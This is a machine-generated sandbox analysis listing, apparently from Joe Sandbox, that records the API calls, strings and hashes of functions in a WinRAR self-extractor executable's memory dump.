                                                                                                    Similarity
                                                                                                    • API ID: AdjustPointer$_abort
                                                                                                    • String ID:
                                                                                                    • API String ID: 2252061734-0
                                                                                                    • Opcode ID: 455464972391342043e41ccc65fdb1ae1b4ec13b5bf787e2deb0d68b2176cbe2
                                                                                                    • Instruction ID: 1ccc4c217c272472457b5ba1164b07ed721ed86385e3500120c37386fba54252
                                                                                                    • Opcode Fuzzy Hash: 455464972391342043e41ccc65fdb1ae1b4ec13b5bf787e2deb0d68b2176cbe2
                                                                                                    • Instruction Fuzzy Hash: D451E172600222BFDB298F14F846BAAB7A4FF54314F24552DEE01772A2D771ED80DB90
                                                                                                    APIs
                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00E2BF39
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E2BF5C
                                                                                                      • Part of subcall function 00E28E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E24286,?,0000015D,?,?,?,?,00E25762,000000FF,00000000,?,?), ref: 00E28E38
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00E2BF82
                                                                                                    • _free.LIBCMT ref: 00E2BF95
                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E2BFA4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 336800556-0
                                                                                                    • Opcode ID: a450837ffa84b31decd24988e4e6048812ec9721113178e9b98c688146bc967f
                                                                                                    • Instruction ID: 9538cbda4f816cf5ac23637f7083fb39a5d2d98129fb628dbd3764e7d5f7bd29
                                                                                                    • Opcode Fuzzy Hash: a450837ffa84b31decd24988e4e6048812ec9721113178e9b98c688146bc967f
                                                                                                    • Instruction Fuzzy Hash: E8017172706A257F332116777D4DCBB6B6EEEC2BA53151129F904F2141EF608D0195B0
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,?,00E291AD,00E2B188,?,00E29813,00000001,00000364,?,00E240EF,?,?,00E41098), ref: 00E2986E
                                                                                                    • _free.LIBCMT ref: 00E298A3
                                                                                                    • _free.LIBCMT ref: 00E298CA
                                                                                                    • SetLastError.KERNEL32(00000000,?,00E41098), ref: 00E298D7
                                                                                                    • SetLastError.KERNEL32(00000000,?,00E41098), ref: 00E298E0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 3170660625-0
                                                                                                    • Opcode ID: 83c815d0a503b2cc08a871980e44f0afd9feeed17220acda344b4f7e0dd94a21
                                                                                                    • Instruction ID: e49ffa85e405b5d52973c434bbe5bddba4884a40cac5e159ff9787b413067cd3
                                                                                                    • Opcode Fuzzy Hash: 83c815d0a503b2cc08a871980e44f0afd9feeed17220acda344b4f7e0dd94a21
                                                                                                    • Instruction Fuzzy Hash: 960121321407356B821E2335BC89D1A2AAAAFC2374B293039F501B22A3EE308C0A4220
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E111CF: ResetEvent.KERNEL32(?), ref: 00E111E1
                                                                                                      • Part of subcall function 00E111CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00E111F5
                                                                                                    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00E10F21
                                                                                                    • CloseHandle.KERNEL32(?,?), ref: 00E10F3B
                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 00E10F54
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00E10F60
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00E10F6C
                                                                                                      • Part of subcall function 00E10FE4: WaitForSingleObject.KERNEL32(?,000000FF,00E11101,?,?,00E1117F,?,?,?,?,?,00E11169), ref: 00E10FEA
                                                                                                      • Part of subcall function 00E10FE4: GetLastError.KERNEL32(?,?,00E1117F,?,?,?,?,?,00E11169), ref: 00E10FF6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 1868215902-0
                                                                                                    • Opcode ID: 27eba0756b73f47e433df9e77d75f97b8e4cfa37b53f77ca9be7e766235cf110
                                                                                                    • Instruction ID: b127c160c7545fe99bee5587f7a876987c8b41e813808bccf59be91c8d65e1b3
                                                                                                    • Opcode Fuzzy Hash: 27eba0756b73f47e433df9e77d75f97b8e4cfa37b53f77ca9be7e766235cf110
                                                                                                    • Instruction Fuzzy Hash: 59015275500744EFC7269B65DC89FC6FBE9FB08711F000929F25AA2161CBB57A85CA50
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 00E2C817
                                                                                                      • Part of subcall function 00E28DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E2C896,?,00000000,?,00000000,?,00E2C8BD,?,00000007,?,?,00E2CCBA,?), ref: 00E28DE2
                                                                                                      • Part of subcall function 00E28DCC: GetLastError.KERNEL32(?,?,00E2C896,?,00000000,?,00000000,?,00E2C8BD,?,00000007,?,?,00E2CCBA,?,?), ref: 00E28DF4
                                                                                                    • _free.LIBCMT ref: 00E2C829
                                                                                                    • _free.LIBCMT ref: 00E2C83B
                                                                                                    • _free.LIBCMT ref: 00E2C84D
                                                                                                    • _free.LIBCMT ref: 00E2C85F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: ed72682eb0c8efdd11b4c07983fe8012124364abb6e66f8ee72d7a19bd50cef0
                                                                                                    • Instruction ID: 2048265e0d9cbedab32ef23a90a388473bd9003fb12c0262e51d7b1954bec660
                                                                                                    • Opcode Fuzzy Hash: ed72682eb0c8efdd11b4c07983fe8012124364abb6e66f8ee72d7a19bd50cef0
                                                                                                    • Instruction Fuzzy Hash: 63F0FF32505224AF9628DB6AF989C1B77EDAB007187747C19F108F76A2CB70FC848A54
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 00E11FE5
                                                                                                    • _wcslen.LIBCMT ref: 00E11FF6
                                                                                                    • _wcslen.LIBCMT ref: 00E12006
                                                                                                    • _wcslen.LIBCMT ref: 00E12014
                                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00E0B371,?,?,00000000,?,?,?), ref: 00E1202F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$CompareString
                                                                                                    • String ID:
                                                                                                    • API String ID: 3397213944-0
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: _swprintf
                                                                                                    • String ID: %ls$%s: %s
                                                                                                    • API String ID: 589789837-2259941744
                                                                                                    APIs
                                                                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00E231FB
                                                                                                    • _abort.LIBCMT ref: 00E23306
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: EncodePointer_abort
                                                                                                    • String ID: MOC$RCC
                                                                                                    • API String ID: 948111806-2084237596
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00E07406
                                                                                                      • Part of subcall function 00E03BBA: __EH_prolog.LIBCMT ref: 00E03BBF
                                                                                                    • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 00E074CD
                                                                                                      • Part of subcall function 00E07A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00E07AAB
                                                                                                      • Part of subcall function 00E07A9C: GetLastError.KERNEL32 ref: 00E07AF1
                                                                                                      • Part of subcall function 00E07A9C: CloseHandle.KERNEL32(?), ref: 00E07B00
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                    • API String ID: 3813983858-639343689
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E01316: GetDlgItem.USER32(00000000,00003021), ref: 00E0135A
                                                                                                      • Part of subcall function 00E01316: SetWindowTextW.USER32(00000000,00E335F4), ref: 00E01370
                                                                                                    • EndDialog.USER32(?,00000001), ref: 00E1AD98
                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00E1ADAD
                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 00E1ADC2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                    • String ID: ASKNEXTVOL
                                                                                                    • API String ID: 445417207-3402441367
                                                                                                    APIs
                                                                                                    • DialogBoxParamW.USER32(GETPASSWORD1,00010420,00E1B270,?,?), ref: 00E1DE18
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: DialogParam
                                                                                                    • String ID: GETPASSWORD1$r$xz
                                                                                                    • API String ID: 665744214-1165776382
                                                                                                    APIs
                                                                                                    • __fprintf_l.LIBCMT ref: 00E0D954
                                                                                                    • _strncpy.LIBCMT ref: 00E0D99A
                                                                                                      • Part of subcall function 00E11DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00E41030,?,00E0D928,00000000,?,00000050,00E41030), ref: 00E11DC4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                    • String ID: $%s$@%s
                                                                                                    • API String ID: 562999700-834177443
                                                                                                    APIs
                                                                                                    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00E0AC5A,00000008,?,00000000,?,00E0D22D,?,00000000), ref: 00E10E85
                                                                                                    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00E0AC5A,00000008,?,00000000,?,00E0D22D,?,00000000), ref: 00E10E8F
                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00E0AC5A,00000008,?,00000000,?,00E0D22D,?,00000000), ref: 00E10E9F
                                                                                                    Strings
                                                                                                    • Thread pool initialization failed., xrefs: 00E10EB7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                    • String ID: Thread pool initialization failed.
                                                                                                    • API String ID: 3340455307-2182114853
                                                                                                    • Opcode ID: 62c4fee5f6a2f7d9181ce97fec3758e427bffe51045812db4cab2c499277fc1f
                                                                                                    • Instruction ID: 1ad8a32e3cff658d5f3b23c8b8571e3340c9dd6fa49fd85d84329b6003292f44
                                                                                                    • Opcode Fuzzy Hash: 62c4fee5f6a2f7d9181ce97fec3758e427bffe51045812db4cab2c499277fc1f
                                                                                                    • Instruction Fuzzy Hash: B81191B16407089FD7215F779C88AA7FBECEB54744F14582EF1DAD2200D6B159C08B50
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Malloc
                                                                                                    • String ID: ($2$A
                                                                                                    • API String ID: 2696272793-112831991
                                                                                                    • Opcode ID: 29681a57fb0935e744a9ad1c5ada26a7c9a8733d874ee5edb8d77c1c4e76c39d
                                                                                                    • Instruction ID: e514d2e0fefb66c1c33729b1e2a86fcd8dab928c43368b7b923574acdd7e5e86
                                                                                                    • Opcode Fuzzy Hash: 29681a57fb0935e744a9ad1c5ada26a7c9a8733d874ee5edb8d77c1c4e76c39d
                                                                                                    • Instruction Fuzzy Hash: 61011771901229AFCF14CFA5E848AEFBBF8AF09354B10416AE906F7250D7749A44DFA4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                    • API String ID: 0-56093855
                                                                                                    • Opcode ID: 9ddfa4d357152d78d93ba3164bf80fe68fbdc289b0ec8a42c9fe7af356bf000a
                                                                                                    • Instruction ID: e64a28c10fd29ced0e21770c629cc0cf1702c3070495502f4457533ec6951b4d
                                                                                                    • Opcode Fuzzy Hash: 9ddfa4d357152d78d93ba3164bf80fe68fbdc289b0ec8a42c9fe7af356bf000a
                                                                                                    • Instruction Fuzzy Hash: E201DE3AA08245AFCB108F66FC049DA7BA8E74A384F001426F911F2230C6308899DBA0
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E0E2E8: _swprintf.LIBCMT ref: 00E0E30E
                                                                                                      • Part of subcall function 00E0E2E8: _strlen.LIBCMT ref: 00E0E32F
                                                                                                      • Part of subcall function 00E0E2E8: SetDlgItemTextW.USER32(?,00E3E274,?), ref: 00E0E38F
                                                                                                      • Part of subcall function 00E0E2E8: GetWindowRect.USER32(?,?), ref: 00E0E3C9
                                                                                                      • Part of subcall function 00E0E2E8: GetClientRect.USER32(?,?), ref: 00E0E3D5
                                                                                                    • GetDlgItem.USER32(00000000,00003021), ref: 00E0135A
                                                                                                    • SetWindowTextW.USER32(00000000,00E335F4), ref: 00E01370
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                    • String ID: $0
                                                                                                    • API String ID: 2622349952-2895914132
                                                                                                    • Opcode ID: 274d4ab2dc4b4bd8a5261af823dd5faea9201ab62726ef83829977dedb69971a
                                                                                                    • Instruction ID: 05df2e21b3ee83ec7c05bc67f8c73dd36f05f0b53d96e5ecb58ff062740d6408
                                                                                                    • Opcode Fuzzy Hash: 274d4ab2dc4b4bd8a5261af823dd5faea9201ab62726ef83829977dedb69971a
                                                                                                    • Instruction Fuzzy Hash: 87F0AF3010438CABDF150F619C0EBEE3B98AF41388F05A694FC44785E2CB78C9D4EA10
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                    • String ID:
                                                                                                    • API String ID: 1036877536-0
                                                                                                    • Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                                                                    • Instruction ID: 053e8f8b07af1c99a9088ed61b5c3540c8e9d58c9b66472d45262797e6914f94
                                                                                                    • Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                                                                    • Instruction Fuzzy Hash: 92A15972A043A69FDB15CF28E8927AEFBE5EF51314F18616DE485BB283C2348941C754
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00E07F69,?,?,?), ref: 00E0A3FA
                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00E07F69,?), ref: 00E0A43E
                                                                                                    • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00E07F69,?,?,?,?,?,?,?), ref: 00E0A4BF
                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000800,?,00E07F69,?,?,?,?,?,?,?,?,?,?), ref: 00E0A4C6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Create$CloseHandleTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 2287278272-0
                                                                                                    • Opcode ID: cd3b13c5a7789873ffa9ae706864d11acef6ef28bc4d93c04e1a8e9bc5e5c477
                                                                                                    • Instruction ID: 6dd2ec340a5285cffe48ab6d09b153ebef628426ec3cefea8a4bb8ef048129ca
                                                                                                    • Opcode Fuzzy Hash: cd3b13c5a7789873ffa9ae706864d11acef6ef28bc4d93c04e1a8e9bc5e5c477
                                                                                                    • Instruction Fuzzy Hash: D741A2312483899AD731DF24DC45FEEBBE49B85704F08092DB5E1E31D1D6A89A88DB53
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,00E247C6,00000000,00000000,00E257FB,?,00E257FB,?,00000001,00E247C6,2DE85006,00000001,00E257FB,00E257FB), ref: 00E2C9D5
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00E2CA5E
                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00E2CA70
                                                                                                    • __freea.LIBCMT ref: 00E2CA79
                                                                                                      • Part of subcall function 00E28E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E24286,?,0000015D,?,?,?,?,00E25762,000000FF,00000000,?,?), ref: 00E28E38
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                    • String ID:
                                                                                                    • API String ID: 2652629310-0
                                                                                                    • Opcode ID: c78efc0fbb19ee67d1166173756285e4777ec45ecaa2066b3c6cf298222e9a10
                                                                                                    • Instruction ID: 5730a709635ba87c6a3c823ced2a9ffc8d3c9b0e0edacd5675ab229738fdd608
                                                                                                    • Opcode Fuzzy Hash: c78efc0fbb19ee67d1166173756285e4777ec45ecaa2066b3c6cf298222e9a10
                                                                                                    • Instruction Fuzzy Hash: CC31BDB2A0022AABDB24CF65EC45DEE7BA5EF01310B144228FC05F6290EB35CD94CB90
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 00E1A666
                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00E1A675
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E1A683
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00E1A691
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: CapsDevice$Release
                                                                                                    • String ID:
                                                                                                    • API String ID: 1035833867-0
                                                                                                    • Opcode ID: b32c456b5ce347d5459141963574d976ed64c07538ce5c038302776d3bc985e9
                                                                                                    • Instruction ID: 02c3fe60077a340795791a40cdb6146af3d87d2c8a033c91eebcecfebe0deb53
                                                                                                    • Opcode Fuzzy Hash: b32c456b5ce347d5459141963574d976ed64c07538ce5c038302776d3bc985e9
                                                                                                    • Instruction Fuzzy Hash: 07E08C35A42721FFC2A01B72BD0DB8B3E14AB16B92F000100FA05B6190DBA48A0C8BA1
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: _wcschr
                                                                                                    • String ID: .lnk$d
                                                                                                    • API String ID: 2691759472-761835416
                                                                                                    • Opcode ID: c019482fd20edc2608091cc727606337fd9e86ad88cfee3edb50cd1f58eb0a1f
                                                                                                    • Instruction ID: 5c2fdcc151f054314824228d4f78657a5df9ac3743dc4abb31536cfac819a437
                                                                                                    • Opcode Fuzzy Hash: c019482fd20edc2608091cc727606337fd9e86ad88cfee3edb50cd1f58eb0a1f
                                                                                                    • Instruction Fuzzy Hash: 9EA16F72904229AADF24DBA0DD45EFA73FCAF44304F08A5A2B509F3151EE749BC4CB61
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00E075E3
                                                                                                      • Part of subcall function 00E105DA: _wcslen.LIBCMT ref: 00E105E0
                                                                                                      • Part of subcall function 00E0A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00E0A598
                                                                                                    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E0777F
                                                                                                      • Part of subcall function 00E0A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00E0A325,?,?,?,00E0A175,?,00000001,00000000,?,?), ref: 00E0A501
                                                                                                      • Part of subcall function 00E0A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00E0A325,?,?,?,00E0A175,?,00000001,00000000,?,?), ref: 00E0A532
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                                    • String ID: :
                                                                                                    • API String ID: 3226429890-336475711
                                                                                                    • Opcode ID: e3e4dfde3c9a8ceef4ec2b2faa18613110d65bf4f525c88b9994a25cf6455893
                                                                                                    • Instruction ID: fa96bb53d17bcb2317064c0e362fdbd29edeadaf4c4665ca6437968e7a459501
                                                                                                    • Opcode Fuzzy Hash: e3e4dfde3c9a8ceef4ec2b2faa18613110d65bf4f525c88b9994a25cf6455893
                                                                                                    • Instruction Fuzzy Hash: 27416E71900258A9EB25EB64DC59EEEB3B8AF51300F005096B64AB20D3DB745FC9CF70
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: _wcschr
                                                                                                    • String ID: *
                                                                                                    • API String ID: 2691759472-163128923
                                                                                                    • Opcode ID: 57a941557fc6f798d42f33461122c056684a008abd1cb9e28c07487b233dd878
                                                                                                    • Instruction ID: 14c3f130ec0d85f71344d7eee18cdb74d7ee20dd829d9841f5b8885d663b0db8
                                                                                                    • Opcode Fuzzy Hash: 57a941557fc6f798d42f33461122c056684a008abd1cb9e28c07487b233dd878
                                                                                                    • Instruction Fuzzy Hash: 093160325443119ACB30AE549902A7B73E4FF90B18F15A01DF9A4B71C3F7668FC59361
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID: }
                                                                                                    • API String ID: 176396367-4239843852
                                                                                                    • Opcode ID: 11b67c9892b6e8bc9242b360b55ae64e247cab854ef03ed59f6af0ff57cc7752
                                                                                                    • Instruction ID: d7aa9d14f563b4078e79ff944e2f6892bddc08346aad35349c48819d5f717530
                                                                                                    • Opcode Fuzzy Hash: 11b67c9892b6e8bc9242b360b55ae64e247cab854ef03ed59f6af0ff57cc7752
                                                                                                    • Instruction Fuzzy Hash: 6421057290431A5AD731EB64E845FABB3EEDF91758F04242AF580E3141EB64DDC883A2
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E0F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00E0F2E4
                                                                                                      • Part of subcall function 00E0F2C5: GetProcAddress.KERNEL32(00E481C8,CryptUnprotectMemory), ref: 00E0F2F4
                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,00E0F33E), ref: 00E0F3D2
                                                                                                    Strings
                                                                                                    • CryptUnprotectMemory failed, xrefs: 00E0F3CA
                                                                                                    • CryptProtectMemory failed, xrefs: 00E0F389
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$CurrentProcess
                                                                                                    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                    • API String ID: 2190909847-396321323
                                                                                                    • Opcode ID: 15df25e1876bd29162feb48213e466b63573694fd4f014804871ba7e89d3463c
                                                                                                    • Instruction ID: 9cb644048492aa20c2dd6bec15cde4a6d351920e970e2087145907c6a35a3246
                                                                                                    • Opcode Fuzzy Hash: 15df25e1876bd29162feb48213e466b63573694fd4f014804871ba7e89d3463c
                                                                                                    • Instruction Fuzzy Hash: 4B1129316012296FDF25AF31ED45A6E3B94FF00774F045126FC417B6E1DA389DA68690
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: _wcschr
                                                                                                    • String ID: <9$?*<>|"
                                                                                                    • API String ID: 2691759472-2723886458
                                                                                                    • Opcode ID: 8762ccf8f76f681c30e86ad589eb9f5b26325afaf5c0fc5afd3b91e2ea15e196
                                                                                                    • Instruction ID: cc6ef6d7618b694878ecd68248c010cd63abb52023b873b8c337930a5dce5c03
                                                                                                    • Opcode Fuzzy Hash: 8762ccf8f76f681c30e86ad589eb9f5b26325afaf5c0fc5afd3b91e2ea15e196
                                                                                                    • Instruction Fuzzy Hash: 71F0A453A45702D5C7301F28A811732F3E4EFD5738F342A1EE5C5E72D2E6A188C0D666
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID: Software\WinRAR SFX$
                                                                                                    • API String ID: 176396367-3959033184
                                                                                                    • Opcode ID: b7bd1bfe6542c57a9b0d40a513dfeb1b9a11a0ba751e5c3845f7f3c2854ffbfe
                                                                                                    • Instruction ID: 719852805a90ffdb67dc680adeb45f0089268a6cd6859b4622adde2b8535a7c5
                                                                                                    • Opcode Fuzzy Hash: b7bd1bfe6542c57a9b0d40a513dfeb1b9a11a0ba751e5c3845f7f3c2854ffbfe
                                                                                                    • Instruction Fuzzy Hash: 2E012175544258BEEB219BA1EC09FDF7FBDEB05794F001051B549B5061D7F04ACCCAA1
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E0C29A: _wcslen.LIBCMT ref: 00E0C2A2
